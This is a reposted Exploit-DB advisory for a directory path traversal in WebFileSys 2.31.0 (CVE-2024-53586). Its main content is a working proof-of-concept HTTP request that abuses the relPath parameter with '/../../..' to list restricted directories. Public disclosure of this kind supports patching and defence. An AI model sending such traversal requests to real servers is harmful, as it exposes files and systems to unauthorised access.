[webapps] WebFileSys 2.31.0 - Directory Path Traversal
WebFileSys 2.31.0 存在目录路径遍历漏洞,攻击者可通过 `relPath` 参数构造恶意请求访问受限目录,CVE-2024-53586。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:5 收藏
WebFileSys 2.31.0 存在目录路径遍历漏洞,攻击者可通过 `relPath` 参数构造恶意请求访问受限目录,CVE-2024-53586。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:5 收藏
# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee
# Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html
# Software Link: http://www.webfilesys.de/webfilesys-home/download.html
# Version: 2.31.0
# Tested on: macOS
# CVE : CVE-2024-53586
GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1
Host: www.webfilesys.de
Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Priority: u=0, i
Te: trailers
Connection: keep-alive
文章来源: https://www.exploit-db.com/exploits/52185
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh